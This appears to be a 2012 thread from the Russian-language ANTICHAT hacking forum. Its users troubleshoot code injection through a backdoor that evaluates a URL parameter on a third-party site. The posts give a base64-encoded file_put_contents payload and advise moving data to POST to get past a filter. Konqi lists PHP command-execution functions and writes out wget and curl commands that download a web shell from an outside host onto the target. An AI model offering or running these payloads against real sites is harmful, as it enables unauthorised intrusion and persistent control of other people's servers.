ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
31.01.2012, 17:04
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от pirat0
pirat0 said:
command denied to user - file_priv нету
(читалка это я так понимаю из розряда LFI??)
или LFI с возможностю читать исходники с помощю php://filter, или читалка, file_get_contents, fopen, прочее
|
|
|
31.01.2012, 17:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Пытаюсь создать файл со следующим содержимым
file_put_contents('lala.php', '');
http://www.site.com/index.php?s=10&id=base64_decode(ZmlsZV9wdXRfY29udG VudHMoJ2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTs=);
mq=on
и поэтому адресу должен появиться файл
http://www.site.com/lala.php
но вместо этого:
404.
Запрошенный Вами документ отсутствует на сервере.
|
|
|
|
31.01.2012, 17:06
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от er9j6@
er9j6@ said:
Пытаюсь создать файл со следующим содержимым
file_put_contents('lala.php', '');
http://www.site.com/index.php?s=10&id=base64_decode(ZmlsZV9wdXRfY29udG VudHMoJ2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTs=);
mq=on
и поэтому адресу должен появиться файл
http://www.site.com/lala.php
но вместо этого:
404.
Запрошенный Вами документ отсутствует на сервере.
ты функцию base64_decode передаешь стринг, почему не вижу кавычки? если mq on, тогда
base64_decode($_GET[a]);&a=твой_base64_код
|
|
|
|
31.01.2012, 17:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Сообщение от Konqi
Konqi said:
ты функцию base64_decode передаешь стринг, почему не вижу кавычки? если mq on, тогда
bas64_decode($_GET[a]);&a=твой_base64_код
Делаю
http://www.site.com/index.php?s=10&id=bas64_decode($_GET[a]);&a=ZmlsZV9wdXRfY29udGVudHMoJ2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTs=
и тут
http://www.site.com/lala.php
все равно выводит
404.
Запрошенный Вами документ отсутствует на сервере.
|
|
|
|
31.01.2012, 18:01
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от er9j6@
er9j6@ said:
Делаю
http://www.site.com/index.php?s=10&id=bas64_decode($_GET[a]);&a=ZmlsZV9wdXRfY29udGVudHMoJ2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTs=
и тут
http://www.site.com/lala.php
все равно выводит
404.
Запрошенный Вами документ отсутствует на сервере.
если твой бекдор принимает пост запросы, папробуй отправить данные POST-ом, по всей видимости там фильтр, или используй другие функции
|
|
|
|
31.01.2012, 18:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Сообщение от Konqi
Konqi said:
если твой бекдор принимает пост запросы, папробуй отправить данные POST-ом, по всей видимости там фильтр, или используй другие функции
Konqi
какие другие функции можно еще использовать?
|
|
|
|
31.01.2012, 18:11
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от er9j6@
er9j6@ said:
Konqi
какие другие функции можно еще использовать?
можешь использовать системные комманды (если safe мод off), system,exec,shell_exec,passthru, залей через wget или curl, или что там еще есть
пример
system($_GET[a]);&a=wget http://site.ru/shell.php
или через принт, print(`curl http://site.ru/shell.php > ./shell.php`);
неоднакратно обсуждалось это тема
|
|
|
|
31.01.2012, 18:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Сообщение от Konqi
Konqi said:
можешь использовать системные комманды (если safe мод off), system,exec,shell_exec,passthru, залей через wget или curl, или что там еще есть
пример
system($_GET[a]);&a=wget http://site.ru/shell.php
или через принт, print(`curl http://site.ru/shell.php > ./shell.php`);
неоднакратно обсуждалось это тема
у меня в шаблоне записан eval, его что нужно заменить sistem?
ipsclass->input['cid'] = 1">
ipsclass->input['id'])">
|
|
|
|
31.01.2012, 18:27
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от er9j6@
er9j6@ said:
у меня в шаблоне записан eval, его что нужно заменить sistem?
ipsclass->input['cid'] = 1">
ipsclass->input['id'])">
не надо ничем заменить, вместо file_put_contents, используйте те функции которые я написал
er9j6@ достаточно зафлудили в теме, листайте топик, уверен найдете все ответы на ваши вопросы
|
|
|
|
31.01.2012, 18:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
er9j6@,
у тебя хостинг от мастерхост, смотрел phpinfo, там отключены системные функции.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
